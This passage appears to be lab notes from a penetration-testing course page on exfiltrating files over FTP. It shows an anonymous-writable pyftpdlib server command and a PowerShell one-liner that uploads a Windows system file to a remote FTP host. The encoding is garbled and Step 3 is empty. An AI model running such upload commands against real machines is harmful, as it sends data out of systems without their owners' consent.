π‘ FTP Uploads
π‘ FTP Uploads β Sending Files the Old-School Way
π οΈ Step 1: Start Your FTP Server with Upload Support
sudo python3 -m pyftpdlib --port 21 --writewrite permissions assigned to anonymous userπ€ Step 2: Upload a File with PowerShell
PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')π Step 3: Use Windows FTP Client to Upload
Now run the FTP command using that file:
π Notes & Tips
Last updated